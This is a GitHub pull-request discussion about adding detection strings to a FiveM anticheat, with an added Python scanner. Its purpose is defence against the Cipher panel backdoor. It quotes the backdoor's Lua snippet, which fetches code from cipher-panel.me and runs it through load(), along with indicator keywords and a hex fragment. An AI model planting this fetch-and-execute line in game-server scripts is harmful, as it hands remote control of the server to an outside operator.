Blumlaut / anticheese-anticheat

the FiveM anticheat, actively fighting against cheaters in FiveM.
The Unlicense

Added some infected strings #35

Closed Blitoka33 closed 2 years ago

Blitoka33 commented 2 years ago

I just added 3 infected strings, to detect more stuff. "cipher", "servduster", "remotecontroller"

Blumlaut commented 2 years ago

Which exploits actually employ these strings? As far as I'm aware, most exploits don't openly name themselves in the scripts.

Blitoka33 commented 2 years ago

> Which exploits actually employ these strings? As far as I'm aware, most exploits don't openly name themselves in the scripts.

Cipher installs a cipher-panel.me PerformHttpRequest into scripts, so it does. servduster is a private one (most likely a Cipher copy, from what I saw), which I saw in some servers (this is not their real name, just a random domain). remotecontroller is a casual suspicious string; it's a string for some runcode exploits.

Blumlaut commented 2 years ago

The examples of Cipher panel payloads I saw were all hexadecimal; that's what the "'68', '74', '74', '70', '73', '3a'" actually is. Do you have a sample of these payloads?

Blitoka33 commented 2 years ago

Yes I can.

```lua
PerformHttpRequest('https://cipher-panel.me/_i/i?to=qJDxOx', function (e, d)
    local s = assert(load(d))
    if (d == nil) then return end
    s()
end)
```

qJDxOx is the userid as far as I know.

I saw it in servers having issues with cipher.

Blumlaut commented 2 years ago

Odd, all cases I saw of it used obfuscated code. I'll merge it anyhow.
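
The two payload forms discussed in this thread (a plain-text URL and a quoted hexadecimal table) can be covered by one check that decodes hex runs before matching. The following is an added example, not code from this pull request or from anticheese; the function names, the minimum run length of four values and the sample inputs are assumptions made for illustration.

```python
import re

# Indicator strings proposed in this pull request.
INDICATORS = ("cipher", "servduster", "remotecontroller")

# A run of quoted two-digit hex values such as '68', '74', '74', '70'.
# Requiring at least four values in a row is an assumption to limit noise.
HEX_RUN = re.compile(r"""(?:['"][0-9a-fA-F]{2}['"]\s*,?\s*){4,}""")
HEX_ITEM = re.compile(r"""['"]([0-9a-fA-F]{2})['"]""")


def decode_hex_runs(source):
    """Return the text spelled out by each run of quoted hex byte values."""
    decoded = []
    for run in HEX_RUN.finditer(source):
        values = HEX_ITEM.findall(run.group(0))
        decoded.append(bytes(int(v, 16) for v in values).decode("latin-1"))
    return decoded


def scan(source):
    """Return sorted (indicator, form) pairs; form is 'plain' or 'hex'."""
    views = [("plain", source.lower())]
    views += [("hex", text.lower()) for text in decode_hex_runs(source)]
    hits = set()
    for form, text in views:
        for indicator in INDICATORS:
            if indicator in text:
                hits.add((indicator, form))
    return sorted(hits)


# Constructed samples. PLAIN is the first line of the snippet posted above;
# HEXED extends the hex fragment quoted above so that it spells "https://cipher".
PLAIN = "PerformHttpRequest('https://cipher-panel.me/_i/i?to=qJDxOx', function (e, d)"
HEXED = "local u = {'68','74','74','70','73','3a','2f','2f','63','69','70','68','65','72'}"
CLEAN = "local colors = {'ff', '00', '7f'}\nprint('hello')"

if __name__ == "__main__":
    for name, sample in (("PLAIN", PLAIN), ("HEXED", HEXED), ("CLEAN", CLEAN)):
        print(name, scan(sample))
```

A substring such as "cipher" also appears in legitimate scripts that deal with encryption, so a hit is a lead for manual review of the resource rather than a verdict.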